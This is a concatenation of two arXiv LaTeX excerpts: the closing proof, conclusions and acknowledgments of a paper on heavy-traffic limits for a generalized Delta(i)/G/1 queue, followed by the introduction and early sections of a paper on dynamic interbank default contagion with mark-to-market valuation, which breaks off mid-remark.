&= \E_{\sss S}[S_{c(i)}^2 \mid \mathcal F_{i-1}]\frac{\lambda ^2}{n^{2}}\Big(\sum_{h=1}^nS_h^{\alpha}\Big)^2 - \E_{\sss S}\Big[S_{c(i)}^2\frac{\lambda ^2}{n^{2}}\sum_{\substack{h,q\in \nu_{i-1}\cup \{c(i)\}\\ \cup \{h = q\}}}S_h^{\alpha}S_q^{\alpha} \mid \mathcal F_{i-1}\Big] + o_{\mathbb P}(1)\notag.
\end{align}%
The second term is an error term by Lemma \ref{lem:unif_convergence_random_sums} and Corollary \ref{cor:nr_joined_customer_at_time_n_twothirds_is_n_twothirds}. This implies that $B_n(\cdot)$ can be rewritten as
\begin{equation}%
B_n(k) = \Big(\frac{\lambda}{n}\sum_{h=1}^nS_h^{\alpha}\Big)^2\sum_{i=1}^k \E_{\sss S}[S_{c(i)}^2 \mid \mathcal F_{i-1}] + o_{\mathbb P}(k),
\end{equation}%
so that
\begin{equation}%
n^{-2/3}B_n(n^{2/3}u) \stackrel{\mathbb P}{\rightarrow} \lambda^2\mathbb E[S^{\alpha}]\mathbb E [S^{2+\alpha}]u,
\end{equation}%
which concludes the proof of \ref{size_biased:eq:second_condition_martingale_FCLT}.
\qed
To conclude the proof of Theorem \ref{th:main_theorem_delta_G_1}, we are left to verify \ref{size_biased:eq:third_condition_martingale_FCLT} and \ref{size_biased:eq:fourth_condition_martingale_FCLT}. However, the estimates in Sections \ref{sec:quadratic_variation_jumps_bounding_process_converges_to_zero} and \ref{sec:martingale_jumps_bounding_process_converges_to_zero} also hold for $B_n(\cdot)$ and $M_n(\cdot)$, since they rely respectively on \eqref{eq:proof_of_iii_final_bound_U} and \eqref{eq:expectation_sup_A_squared_start} to bound the lower-order contributions to the drift. This concludes the proof of Theorem \ref{th:main_theorem_delta_G_1}.
\qed
\section{Conclusions and discussion}\label{sec:conclusion}
{In this paper we have considered a generalization of the $\smash{\Delta_{(i)}/G/1}$ queue, which we coined the $\DGa$ queue, a model for the dynamics of a queueing system in which only a finite number of customers can join. In our model, the arrival time of a customer depends on its service requirement through a parameter $\alpha\in[0,1]$. We have proved that, under a suitable heavy-traffic assumption, the diffusion-scaled queue-length process embedded at service completions converges to a stochastic process $W(\cdot)$.
A distinctive characteristic of our results is the so-called \emph{depletion-of-points effect}, represented by a quadratic drift in $W(\cdot)$. A (directed) tree is associated to the $\DGa$ queue in a natural way, and the heavy-traffic assumption corresponds to \emph{criticality} of the associated random tree.
Our result interpolates between two already known results. For $\alpha = 0$ the arrival clocks are i.i.d.~and the analysis simplifies significantly. In this context, \cite{bet2014heavy} proves an analogous heavy-traffic diffusion approximation result. Theorem \ref{th:main_theorem_delta_G_1} can then be seen as a generalization of \cite[Theorem 5]{bet2014heavy}. If $\alpha = 1$, the $\DGa$ queue has a natural interpretation as an exploration process of an inhomogeneous random graph. In this context, \cite{bhamidi2010scaling} proves that the ordered component sizes converge to the excursion of a reflected Brownian motion with parabolic drift. Our result can then also be seen as a generalization of \cite{bhamidi2010scaling} to the \emph{directed} components of directed inhomogeneous random graphs.
Lemma \ref{lem:size_biased_distribution} implies that the distribution of the service time of the first $O(n^{2/3})$ customers to join the queue converges to the $\alpha$-\emph{size-biased} distribution of $S$, irrespectively of the precise time at which the customers arrive. This suggests that it is possible to prove Theorem \ref{th:main_theorem_delta_G_1} by approximating the $\DGa$ queue via a $\smash{\Delta_{(i)}/G/1}$ queue with service time distribution $S^*$ such that
\begin{equation}%
\mathbb P(S^*\in \mathcal A) = \mathbb E[S^{\alpha}\mathds 1_{\{S\in\mathcal A\}}]/\mathbb E[S^{\alpha}],
\end{equation}%
and i.i.d.~arrival times distributed as $T_i\sim\exp (\lambda\mathbb E[S^{\alpha}])$. This conjecture is supported by two observations. First, the heavy-traffic conditions for the two queues coincide. Second, the standard deviation of the Brownian motion is the same in the two limiting diffusions. However, this approximation fails to capture the higher-order contributions to the queue-length process. As a result, the coefficients of the negative quadratic drift in the two queues are different, and thus the approximation of the $\DGa$ queue with a $\smash{\Delta_{(i)}/G/1}$ queue is insufficient to prove Theorem \ref{th:main_theorem_delta_G_1}.
Surprisingly, the assumption that $\alpha$ lies in the interval $[0,1]$ plays no role in our proof. On the other hand, we see from \eqref{eq:main_theorem_delta_G_1_diffusion_definition} that
\begin{equation}\label{eq:moments_assumption_for_general_alpha}%
\max\{\mathbb E[S^{2+\alpha}],\mathbb E[S^{1+2\alpha}],\mathbb E[S^{\alpha}]\}<\infty
\end{equation}%
is a necessary condition for Theorem \ref{th:main_theorem_delta_G_1} to hold. From this we conclude that Theorem \ref{th:main_theorem_delta_G_1} remains true as long as $\alpha\in\mathbb R$ is such that \eqref{eq:moments_assumption_for_general_alpha} is satisfied. From the modelling point of view, $\alpha>1$ represents a situation in which customers with larger job sizes have a stronger incentive to join the queue. On the other hand, when $\alpha < 0$ the queue models a situation in which customers with large job sizes are lazy and thus favour joining the queue later. We remark that the \emph{form} of the limiting diffusion is the same for all $\alpha\in\mathbb R$, but different values of $\alpha$ yield different fluctuations (standard deviation of the Brownian motion), and a different quadratic drift.
\paragraph{Acknowledgments}
This work is supported by the NWO Gravitation {\sc Networks} grant 024.002.003. The work of RvdH is further supported by the NWO VICI grant 639.033.806. The work of GB and JvL is further supported by an NWO TOP-GO grant and by an ERC Starting Grant.
\bibliographystyle{abbrv}
\DeclareRobustCommand{\HOF}[3]{#3}
| 2024-02-18T23:40:17.850Z | 2017-04-12T02:10:29.000Z | algebraic_stack_train_0000 | 1,971 | 17,253 |
|
proofpile-arXiv_065-9734 | \section{Introduction}\label{sec:intro}
Systemic risk can cause outsized losses within the financial system due to feedback mechanisms such as direct default contagion, or, as we study in this paper, expectations of future defaults. The severity of this was evidenced by the excessive losses during the 2008 financial crisis. In this work we present a model for debt interlinkages in a dynamic financial system that allows us to study such contagious events, arising from the appropriate (equilibrium) pricing of the interbank obligations.
The network of interbank obligations, and the resulting default contagion, has been studied in the seminal works of~\cite{EN01,RV13,GK10} in deterministic one-period systems. These static systems have been extended in a number of directions and remains an active area of research; we refer the interested reader to~\cite{glasserman2016contagion,AW_15} for surveys of this literature. More recent extensions have been presented in, e.g., \cite{paddrik2020contagion} which studies the potential for contagion through margin requirements, \cite{klages2020cascading} which analyzes (re)insurance networks, and \cite{ghamami2022collateralized} which considers collateralization in interbank networks.
Within this work, we base much of our analysis on a system with fixed recovery of liabilities, i.e., in which institutions either make all debt payments in full or a fixed fraction of liabilities are returned. We extend this modeling framework to allow for system dynamics between the origination date and maturities of the obligations.
Dynamic default contagion extensions of the works of~\cite{EN01,RV13,GK10} have previously been studied in~\cite{CC15,ferrara16,KV16} in discrete-time settings and~\cite{BBF18,sonin2020continuous,feinstein2021dynamic} in continuous-time frameworks. All of these cited works, however, use (implicitly) a historical price accounting rule for marking interbank assets. That is, all interbank assets are either marked as if the payment will be made in full (prior to maturity or a default) or marked based on the realized payment (after debt maturity or the default event). This is in contrast to the mark-to-market accounting used for tradable assets where the value of interbank assets would depend on the expected payments (prior to maturity or a default).
Consequently, we want to study a dynamic default contagion model with forward-looking probabilities of default so as to mark interbank assets to a market within the balance sheet of all firms. This construction is a network valuation adjustment to the single-firm Black--Cox model (\cite{black1976valuing}) for pricing obligations in a network. We thus extend the prior literature on network valuation adjustments (e.g.,~\cite{CS07network, fischer2014,barucca2020network,banerjee2022pricing}) which consider obligations in systems with a single maturity and without the possibility for early declarations of default (i.e., default can only be declared at the maturity of the obligations). Such static systems are comparable to the single firm model of~\cite{merton1974} for pricing debt and equity. Herein we relax this assumption to allow for, e.g., safety covenants as in~\cite{black1976valuing,leland1994corporate} to permit for early declarations of bankruptcy.
As already emphasized, we introduce a dynamic network model with either a single or multiple maturity dates. In constructing and analyzing this systemic risk model, we make the following four primary innovations and contributions.
\begin{enumerate}
\item First, we construct a dynamic network model with a forward-looking marking of interbank assets based on their (risk-neutral) probabilities of default. This mark-to-market accounting of interbank assets is in contrast to prior works on dynamic networks which (implicitly or explicitly) consider historical price accounting, i.e., all debts are assumed to be paid in full until a default is realized (at which time a downward jump in equity occurs). Notably, by accounting for the possibility of future defaults, contagion can occur without a default having occurred but merely that one may happen in the future. With abuse of terminology, we find that default contagion can occur without any realized default.
\item Second, using these equilibrium default probabilities, we are able to construct a term structure for debts that includes the possibility of contagious events. As such, the proposed modeling framework naturally constructs a network valuation adjustment for the entire yield curve for every bank within the financial system.
\item Third, we study the mathematical properties of the clearing solutions of this dynamic network. Notably, though the system is presented as a fixed point problem at all times simultaneously, we present an equivalent formulation satisfying the dynamic programming principle which, in particular, allows us to prove that the (maximal) equilibrium solution in an extended state space satisfies the Markov property.
\item Fourth, as far as the authors are aware, this is the first dynamic interbank network model that directly considers the manner in which banks may rebalance their portfolio over time as asset prices fluctuate and defaults are realized. Specifically, we present simple rebalancing strategies as well as an optimal strategy that incorporates regulatory constraints.
\end{enumerate}
Throughout this work, we demonstrate the financial implications of this model with numerical case studies. In particular, we wish to highlight the nonlinear and non-monotonic behavior of the probability of default with respect to the correlations between bank assets (see Section~\ref{sec:1maturity-cs-corr} and Figure~\ref{fig:corr}). Furthermore, holding everything else fixed, we find that the shape of the yield curve for one firm can depend on the riskiness of other banks in the system; specifically, if the volatility of core institutions grow, the yield curve for all institutions can transform from a normal to inverted shape (see Section~\ref{sec:Kmaturity-cs-cp} and Figure~\ref{fig:cp}).
The remainder of this paper is as follows.
In Section~\ref{sec:setting}, background information is provided. Specifically, in Section~\ref{sec:setting-network}, the static version of our interbank system is presented so as to illuminate notation and the general structure considered for the dynamic models presented later. The tree-based probability spaces used throughout this work are presented in Section~\ref{sec:setting-tree}.
In Section~\ref{sec:1maturity}, a dynamic system is constructed in which all obligations (interbank and external) are due at the same \emph{future} maturity. In constructing this system, the value of interbank assets is weighted by the (risk-neutral) probability of the payment being made in full, i.e., the risk-neutral expectation of the asset value at maturity. Existence of maximal and minimal clearing solutions is presented along with properties of these extremal solutions.
In Section~\ref{sec:Kmaturity}, this system is extended to permit multiple maturity dates for obligations. In doing so, defaults can occur due to either \emph{insolvency} or \emph{illiquidity}. As with the single maturity setting, the existence of clearing solutions and their properties are presented. Within this construction, the composition of assets and the manner in which banks rebalance their portfolios are directly considered.
Finally, in Section~\ref{sec:conclusion}, we provide some simple policy implications of our model as well as directions for future research.
\section{Setting}\label{sec:setting}
\subsection{Interbank networks}\label{sec:setting-network}
Within this work we will consider a \emph{dynamic} financial system akin to the static model of \cite{GK10} for default contagion. To briefly provide the financial context and some basic notation, we will summarize the static setting which we will extend in the subsequent sections.
Consider a financial system comprised of $n$ banks or other financial institutions labeled $1,2,...,n$. The balance sheet of each bank is made up of both interbank and external assets and liabilities.
Specifically, on the asset side of the balance sheet, bank $i$ holds external assets $x_i \geq 0$ and interbank assets $L_{ji} \geq 0$ for each potential counterparty $j = 1,2,...,n$ (with $L_{ii} = 0$ so as to avoid self-dealing).
On the side of the balance sheet, bank $i$ has liabilities $\bar p_i := \sum_{j = 1}^n L_{ij} + L_{i0}$ with external liabilities $L_{i0} \geq 0$.
We will often denote $\vec{x} := (x_1,x_2,...,x_n)^\top \in \mathbb{R}^n_+$, $\vec{L} := (L_{ij})_{i,j = 1,2,...,n} \in \mathbb{R}^{n \times n}_+$, $\vec{L}_0 := (L_{ij})_{i = 1,2,...,n;~j=0,1,...,n} \in \mathbb{R}^{n \times (n+1)}_+$, and $\bar\vec{p} := \vec{L}_0\vec{1} \in \mathbb{R}^n_+$.
With these assets and liabilities, we can consider the default contagion problem. Consider $P_i \in \{0,1\}$ to be the indicator of whether bank $i$ is solvent ($P_i = 1$) or in default on its obligations ($P_i = 0$). Following a notion of recovery of liabilities, if a bank is in default then it will repay a fraction $\beta \in [0,1]$ of its obligations; the Rogers--Veraart model~(\cite{RV13}) is comparable but with recovery of assets instead.
Mathematically, $\vec{P} \in \{0,1\}^n$ solves the fixed point problem
\begin{equation}\label{eq:GK}
\vec{P} = \psi(\vec{P}) := \ind{\vec{x} + \vec{L}^\top [\vec{P} + \beta(1-\vec{P})] \geq \bar\vec{p}} = \ind{\vec{x} + \vec{L}^\top[\beta + (1-\beta)\vec{P}] \geq \bar\vec{p}}.
\end{equation}
\begin{proposition}\label{prop:GK}
The set of clearing solutions to~\eqref{eq:GK}, i.e., $\{\vec{P}^* \in \{0,1\}^n \; | \; \vec{P}^* = \psi(\vec{P}^*)\}$, forms a lattice in $\{0,1\}^n$ with greatest and least solutions $\vec{P}^\uparrow \geq \vec{P}^\downarrow$.
\end{proposition}
\begin{proof}
This follows from a direct application of Tarski's fixed point theorem.
\end{proof}
To conclude this discussion of the static system, let $\vec{P}^*$ be an arbitrary clearing solution of~\eqref{eq:GK}. The resulting net worths $\vec{K} = \vec{x} + \vec{L}^\top [\vec{P}^*+\beta(1-\vec{P}^*)] - \bar\vec{p}$ provide the difference between realized assets and liabilities. The cash account $\vec{V} = \vec{K}^+$ provides the assets-on-hand for each institution immediately after liabilities are paid; notably the cash account equals the net worths if, and only if, the bank is solvent, otherwise it is zero.
\begin{remark}
As mentioned above, throughout this work we consider the case of recovery of liabilities. This notion corresponds to the ``recovery of face value'' accounting rule in the corporate bond literature (see, e.g.,~\cite{guo2008distressed,hilscher2021valuation}). The recovery of assets case, as in~\cite{RV13}, could be considered instead. We restrict ourselves to the recovery of liabilities because this formulation has been shown to ``provide a better approximation to realized recovery rates'' (\cite{hilscher2021valuation}) than the recovery of assets formulation.
\end{remark}
\subsection{Tree model}\label{sec:setting-tree}
For the remainder of this work, we will consider a \emph{stochastic} financial system. For mathematical simplicity, we will focus entirely on tree models for the randomness in the system.
That is, throughout this work, we consider a \emph{finite} filtered probability space $(\Omega,\mathcal{F},(\mathcal{F}_{t_l})_{l = 0}^\ell,\P)$ with times $0 =: t_0 < t_1 < ... < t_\ell := T$, $\mathcal{F}_T = \mathcal{F} = 2^\Omega$, and $\mathcal{F}_0 = \{\emptyset,\Omega\}$.
Following the notation from~\cite{FR14-alg}, we will define $\Omega_t$ to be the set of atoms of $\mathcal{F}_t$. For any $\omega_t \in \Omega_t$ ($t < T$), we denote the successor nodes by
\[\succ(\omega_{t_l}) = \{\omega_{t_{l+1}} \in \Omega_{t_{l+1}} \; | \; \omega_{t_{l+1}} \subseteq \omega_{t_l}\}.\]
To simplify notation, let $\mathcal{L}_t := L^\infty(\Omega,\mathcal{F}_t,\P) = \mathbb{R}^{|\Omega_t|}$ denote the space of $\mathcal{F}_t$-measurable random variables.
We use the convention that for an $\mathcal{F}_t$-measurable random variable $x \in \mathcal{L}_t$, we denote by $x(\omega_t)$ the value of $x$ at node $\omega_t \in \Omega_t$, that is $x(\omega_t) := x(\omega)$ for some $\omega \in \omega_t$ chosen arbitrarily.
\begin{assumption}\label{ass:msr}
Throughout this work we consider an (arbitrage-free) market of $n$ external assets $\vec{x} \in \prod_{l = 0}^\ell \mathcal{L}_t^n$ on the tree. This is made more explicit in Sections~\ref{sec:1maturity-bs} and~\ref{sec:Kmaturity-bs} below.
To simplify the discussion, we consider the probability measure $\P$ to provide a pricing measure consistent with $\vec{x}$.
\end{assumption}
Often, for the case studies, we consider a specific tree model from~\cite{he1990convergence} to construct a geometric random walk for a financial system with $n$ banks. This multinomial tree permits us to encode a correlation structure on our processes from $n+1$ branches at each node.
Let $(\Omega^n,\mathcal{F}^n,(\mathcal{F}_{l\Delta t}^n)_{l = 0}^{T/\Delta t},\P^n)$ denote the filtered probability space for this multinomial tree with constant time steps $\Delta t > 0$. (For simplicity, we assume throughout that $T$ is divisible by the time step $\Delta t$.) As there are $n+1$ branches at each node within this tree, $|\Omega_t^n| = (n+1)^{t/\Delta t}$ at each time $t = 0,\Delta t,...,T$ with equal probability $\P^n(\omega_t^n) = (n+1)^{-t/\Delta t}$ for any $\omega_t^n \in \Omega_t^n$.
Because of the regularity of this system, we will index the atoms at time $t$ as $\omega_{t,i}^n \in \Omega_t^n$ for $i = 1,2,...,(n+1)^{t/\Delta t}$. Similarly, we can encode the successor nodes automatically as $\succ(\omega_{t,i}^n) = \{\omega_{t+\Delta t,j}^n \; | \; j \in (n+1)(i-1)+\{1,...,n+1\}\}$ for any time $t$ and atom $i$.
Within the tree $(\Omega^n,\mathcal{F}^n,(\mathcal{F}_{l\Delta t}^n)_{l = 0}^{T/\Delta t},\P^n)$, we are interested in a discrete analog $\vec{x} := (\vec{x}(0),\vec{x}(\Delta t),...,\vec{x}(T)) \in \prod_{l = 0}^{T/\Delta t} \mathcal{L}_{l\Delta t}^n$ of the vector-valued geometric Brownian motion (such that $\vec{x}(t) = (x_1(t),x_2(t),...,x_n(t))^\top$). Following the construction in~\cite{he1990convergence}, let $\sigma = (\sigma_1,...,\sigma_n) \in \mathbb{R}^{n \times n}$ be a nondegenerate matrix encoding the desired covariance structure $C = \sigma^2$.
The $k^\text{th}$ element $x_k$ can be defined recursively by
\begin{align}
\label{eq:gbm} x_k(t+\Delta t,\omega_{t+\Delta t,(n+1)(i-1)+j}^n) &= x_k(t,\omega^n_{t,i})\exp\left((r - \frac{\sigma_{kk}^2}{2})\Delta t + \sigma_k^\top \tilde{\epsilon}_j\sqrt{\Delta t}\right)
\end{align}
for some initial point $x_k(0,\Omega^n) \in \mathbb{R}^n_{++}$ and such that $\tilde{\epsilon} = (\tilde{\epsilon}_1,...,\tilde{\epsilon}_{n+1}) \in \mathbb{R}^{n \times (n+1)}$ is generated from an $(n+1)\times(n+1)$ orthogonal matrix as in~\cite{he1990convergence}.
\section{Single maturity setting}\label{sec:1maturity}
To simplify the presentation and to separate out those effects that arise due to dynamic networks (see Section~\ref{sec:Kmaturity} and also~\cite{BBF18}) from those arising due to the pricing and endogenous default notions considered in this section, we will begin by assuming that all interbank and external obligations $L_{ij},L_{i0}$ (for $i,j \in \{1,2,...,n\}$) have the same maturity $T$. We start our discussion of this single maturity setting by presenting the basic balance sheet notions in Section~\ref{sec:1maturity-bs}. With this balance sheet construction, we then derive the clearing problem and deduce the existence of (minimal and maximal) equilibria in Section~\ref{sec:1maturity-model}. Next, we consider two useful reformulations of the resulting mathematical model for the clearing problem: the first relies on Bayes' rule to provide a forward-backward equation (Section~\ref{sec:1maturity-recursion}) that is tractable computationally; the second provides a dynamic programming principle formulation (Section~\ref{sec:1maturity-dpp}) for the maximal clearing solution which, in particular, provides a Markovian property for this clearing solution. Finally, we conclude the section with case studies in Section~\ref{sec:1maturity-cs}.
\subsection{Balance sheet construction}\label{sec:1maturity-bs}
\begin{figure}[h!]
\centering
\begin{tikzpicture}
\draw[draw=none] (0,6.5) rectangle (6.5,7) node[pos=.5]{\bf Book Value at Time $t$};
\draw[draw=none] (0,6) rectangle (3.25,6.5) node[pos=.5]{\bf Assets};
\draw[draw=none] (3.25,6) rectangle (6.5,6.5) node[pos=.5]{\bf Liabilities};
\filldraw[fill=blue!20!white,draw=black] (0,4) rectangle (3.25,6) node[pos=.5,style={align=center}]{External \\ $x_i(t)$};
\filldraw[fill=yellow!20!white,draw=black] (0,0) rectangle (3.25,4) node[pos=.5,style={align=center}]{Interbank \\ $e^{-r(T-t)}\sum_{j = 1}^n L_{ji}$};
\filldraw[fill=purple!20!white,draw=black] (3.25,3) rectangle (6.5,6) node[pos=.5,style={align=center}]{Total \\ $e^{-r(T-t)}\bar p_i$};
\filldraw[fill=orange!20!white,draw=black] (3.25,0) rectangle (6.5,3) node[pos=.5,style={align=center}]{Capital \\ $x_i(t) - e^{-r(T-t)}\bar p_i$ \\ $+ e^{-r(T-t)}\sum_{j = 1}^n L_{ji}$};
\draw[->,line width=1mm] (7,3) -- (8,3);
\draw[draw=none] (8.5,6.5) rectangle (15,7) node[pos=.5]{\bf Realized Balance Sheet at Time $t$};
\draw[draw=none] (8.5,6) rectangle (11.75,6.5) node[pos=.5]{\bf Assets};
\draw[draw=none] (11.75,6) rectangle (15,6.5) node[pos=.5]{\bf Liabilities};
\filldraw[fill=blue!20!white,draw=none] (8.5,4) rectangle (11.75,6) node[pos=.5,style={align=center}]{External \\ $x_i(t)$};
\filldraw[fill=yellow!20!white,draw=black] (8.5,1) rectangle (11.75,4) node[pos=.5,style={align=center}]{Interbank \\ $\sum_{j = 1}^n p_{ji}(t)$};
\filldraw[fill=yellow!20!white,draw=black] (8.5,0) rectangle (11.75,1);
\filldraw[fill=purple!20!white,draw=black] (11.75,3) rectangle (15,6) node[pos=.5,style={align=center}]{Total \\ $e^{-r(T-t)}\bar p_i$};
\filldraw[fill=orange!20!white,draw=black] (11.75,1) rectangle (15,3) node[pos=.5,style={align=center}]{Capital \\ $x_i(t) - e^{-r(T-t)}\bar p_i$ \\ $+ \sum_{j = 1}^n p_{ji}(t)$};
\filldraw[fill=orange!20!white,draw=black] (11.75,0) rectangle (15,1);
\draw (8.5,0) rectangle (15,6);
\draw (11.75,0) -- (11.75,6);
\begin{scope}
\clip (8.5,0) rectangle (15,1);
\foreach \x in {-8.5,-8,...,15}
{
\draw[line width=.5mm] (8.5+\x,0) -- (15+\x,6);
}
\end{scope}
\end{tikzpicture}
\caption{Stylized book and balance sheet for a firm at time $t$ before maturity of interbank claims.}
\label{fig:balance_sheet}
\end{figure}
In this work we are focused on the valuing of interbank assets with endogenous defaults in a networked system of $n$ banks in a way that extends the static model presented in Section~\ref{sec:setting-network}. We refer to Figure~\ref{fig:balance_sheet} as a visual depiction of both the book value and realized balance sheet for arbitrary bank $i$ in the financial system. Within this system, we assume a constant risk-free rate $r \geq 0$ used for discounting all obligations.
Consider, first, the banking book for bank $i$ as depicted in Figure~\ref{fig:balance_sheet}. The bank holds two types of assets at time $t$: \emph{external assets} $x_i(t) \in \mathcal{L}_t$ and \emph{interbank assets} $\sum_{j = 1}^n L_{ji}$ where $L_{ji} \geq 0$ is the total obliged from bank $j$ to $i$ ($L_{ii} = 0$ so as to avoid self-dealing). The bank has liabilities $\bar p_i := \sum_{j = 1}^n L_{ij} + L_{i0}$ where $L_{i0} \geq 0$ denotes the \emph{external obligations} of bank $i$. The external assets are held in liquid and marketable assets so that their value fluctuates over time and are adapted to the filtration.
The book value of the capital, discounted appropriately, is given by
\[x_i(t) + e^{-r(T-t)}\sum_{j = 1}^n L_{ji} - e^{-r(T-t)}\bar p_i.\]
However, depending on the probability of default (see below for more details), the interbank assets will not be valued at their face value. That is, the obligation from bank $j$ to $i$ is valued as $p_{ji}(t) := e^{-r(T-t)} L_{ji} (\beta + (1-\beta)\mathbb{E}[P_j(T) \; | \; \mathcal{F}_t]) \in \mathcal{L}_t$ that takes value (almost surely) in the interval $e^{-r(T-t)} L_{ji}\times[\beta,1]$ where $P_j(T,\omega)$ is the realized indicator of solvency for bank $j$ at the maturity time $T$ and $\beta \in [0,1]$ is the recovery rate.
Defining $P_j(t) := \mathbb{E}[P_j(T) \; | \; \mathcal{F}_t] \in \mathcal{L}_t$ as the (conditional) probability of solvency at maturity as measured at time $t$, we can write the discounted payments as $p_{ji}(t) = e^{-r(T-t)} L_{ji}(\beta+(1-\beta)P_j(t))$. Thus, the realized balance sheet for bank $i$ has, possible, write-downs in the value of assets and, therefore, the realized capital at time $t$ is given by
\[K_i(t) = x_i(t) + e^{-r(T-t)} \sum_{j = 1}^n L_{ji} (\beta+(1-\beta)P_j(t)) - e^{-r(T-t)}\bar p_i.\]
The default determination of banks is fundamental for determining the value of interbank assets. In this work, as in the static setting, we will assume that bank $i$ will default on their obligations at the first time their realized capital drops below 0, i.e., at the stopping time $\tau_i$ given by
\begin{equation}\label{eq:default}
\tau_i := \inf\left\{t \geq 0 \; \left| \; K_i(t) < 0 \right.\right\}.
\end{equation}
In the context of endogenous defaults, the shareholders of bank $i$ choose to default at time $t$ when expected bank assets are worth less than the liabilities; by declaring bankruptcy, these shareholders are able to increase their risk-neutral utility as zero capital is preferred to negative expected return. Alternatively, these defaults can be triggered by a safety covenant as in~\cite{black1976valuing,leland1994corporate}.
This default condition was studied in~\cite{feinstein2021dynamic} in a different dynamic network context.
By convention, and without loss of generality, we will assume $\tau_i(\omega) = T+1$ if bank $i$ does not default on $\omega \in \Omega$.
With banks defaulting when their capital drops below 0, this network valuation problem can be viewed as a fixed point problem in pricing digital (down-and-out) barrier options. That is, $P_i(t)$ is the value of the digital barrier option with maturity $T$ with a payoff of \$1 if the barrier that the capital level $K_i$ never drops below 0 and payoff of \$0 otherwise. This is a fixed point due to the dependence of the capital $K_i$ on the value of the barrier options $P_j$ for banks $j \neq i$.
As such, though we do not compute the valuations as digital barrier options, we view this system as being inextricably linked to questions in derivatives pricing.
\begin{remark}\label{rem:literature}
\begin{enumerate}
\item\label{rem:illiquid} The default rule considered herein implicitly studies the liquidity problem as well because bank $i$ has sufficient assets to cover its liabilities at the maturity $T$ if and only if the realized capital at $T$ is nonnegative. If only the liquidity question is desired, then the default time can be reformulated such that $\tau_i = T+\ind{K_i(T) \geq 0}$, i.e., bank $i$ is in default if and only if it has insufficient capital at maturity to cover its obligations. This illiquidity default rule is akin to the financial setting of~\cite{banerjee2022pricing}.
\item The condition that a bank will default when its net worth is negative is similarly considered in~\cite{BBF18,feinstein2021dynamic}. However, fundamentally different from those works (which consider a backward-looking historical price accounting rule), herein we consider a forward-looking accounting mark-to-market accounting rule which values interbank assets based on the \emph{future} probability of default.
\end{enumerate}
\end{remark}
\begin{remark}\label{rem:nonmarketable}
Throughout this work we assume that the interbank network is fixed even as the value of these obligations can fluctuate. As we assume all valuations are taken w.r.t.\ the risk-neutral measure $\P$, and under the assumption that banks are risk-neutral themselves, in equilibrium the banks have no (expected) gains by altering the network structure by buying or selling interbank obligations. Moreover, in reality, these interbank markets may not be liquid; therefore, transacting to buy or sell interbank debt could be accompanied by transaction costs and price slippage which discourage any such modifications to the network.
\end{remark}
\subsection{Mathematical model}\label{sec:1maturity-model}
As highlighted within the balance sheet modeling, we can immediately define an equilibrium model for default contagion that is jointly on the net worths ($\vec{K} = (K_1,...,K_n)^\top$), survival probabilities ($\vec{P} = (P_1,...,P_n)^\top$), and default times ($\boldsymbol{\tau} = (\tau_1,...,\tau_n)^\top$).
We can, thus, define the domain for this default contagion model as the complete lattice
\begin{equation*}
\mathbb{D}^T := \left\{(\vec{K},\vec{P},\boldsymbol{\tau}) \in \left(\prod_{l = 0}^\ell \mathcal{L}_{t_l}^n\right)^2 \times \{t_0,t_1,...,t_\ell,T+1\}^{|\Omega| \times n} \; \left| \; \begin{array}{l} \forall t = t_0,t_1,...,t_\ell: \\ \vec{K}(t) \in \vec{x}(t) + e^{-r(T-t)}\left([\vec{0} \; , \; \vec{L}^\top\vec{1}] - \bar\vec{p}\right) \\ \vec{P}(t) \in [\vec{0} \; , \; \vec{1}] \end{array} \right.\right\}.
\end{equation*}
(We wish to recall for the reader that throughout this work we focus entirely on the tree model structure provided within Section~\ref{sec:setting-tree}, which is, in particular, a finite probability space.)
This clearing system $\Psi^T: \mathbb{D}^T \to \mathbb{D}^T$ is mathematically constructed in~\eqref{eq:1maturity}:
\begin{align}
\label{eq:1maturity} &(\vec{K},\vec{P},\boldsymbol{\tau}) = \Psi^T(\vec{K},\vec{P},\boldsymbol{\tau}) := (\Psi^T_{\vec{K}}(t_l,\vec{P}(t_l)) \; , \; \Psi^T_{\vec{P}}(t_l,\boldsymbol{\tau}) \; , \; \Psi^T_{\boldsymbol{\tau}}(\vec{K}))_{l = 0}^\ell \\
\nonumber &\begin{cases}
\Psi^T_{\vec{K},i}(t,\tilde{\vec{P}}) = x_i(t) + e^{-r(T-t)}\sum_{j = 1}^n L_{ji} (\beta+(1-\beta)\tilde{P}_j) - e^{-r(T-t)}\bar p_i \\
\Psi^T_{\vec{P},i}(t,\boldsymbol{\tau}) = \P(\tau_i > T \; | \; \mathcal{F}_t) \\
\Psi^T_{\boldsymbol{\tau},i}(\vec{K}) = \inf\{t \geq 0 \; | \; K_i(t) < 0\}
\end{cases} \quad \forall i = 1,...,n.
\end{align}
\begin{remark}\label{rem:mckean-vlasov}
The clearing problem $(\vec{K},\vec{P},\boldsymbol{\tau}) = \Psi^T(\vec{K},\vec{P},\boldsymbol{\tau})$ can also be viewed as a discrete-time McKean--Vlasov problem for the process $\vec{K}$ and the conditional law of its first hitting time of zero, thus emphasizing a link to works on continuous-time McKean--Vlasov problems involving hitting times~(\cite{HLS18,NS17}). However, the situation here is very different, as we are now concerned with the law of the hitting time at the maturity $T$ conditional on the information available at time $t$, rather than just the law at time $t$. Whether in discrete- or continuous-time, we are not aware of any works in the literature on McKean--Vlasov problems encompassing problems of this type, but it turns out that the discrete-time setting and monotonicity yields an easy way of obtaining a solution. A more general treatment of this class of problems could pose interesting challenges for future research.
\end{remark}
\begin{theorem}\label{thm:1maturity-exist}
The set of clearing solutions to~\eqref{eq:1maturity}, i.e., $\{(\vec{K}^*,\vec{P}^*,\boldsymbol{\tau}^*) \in \mathbb{D}^T \; | \; (\vec{K}^*,\vec{P}^*,\boldsymbol{\tau}^*) = \Psi^T(\vec{K}^*,\vec{P}^*,\boldsymbol{\tau}^*)\}$, forms a lattice in $\mathbb{D}^T$ with greatest and least solutions $(\vec{K}^\uparrow,\vec{P}^\uparrow,\boldsymbol{\tau}^\uparrow) \geq (\vec{K}^\downarrow,\vec{P}^\downarrow,\boldsymbol{\tau}^\downarrow)$.
\end{theorem}
\begin{proof}
As with Proposition~\ref{prop:GK}, this result follows from a direct application of Tarski's fixed point theorem since $\Psi^T$ is monotonic in the complete lattice $\mathbb{D}^T$.
\end{proof}
\begin{remark}\label{rem:nonunique}
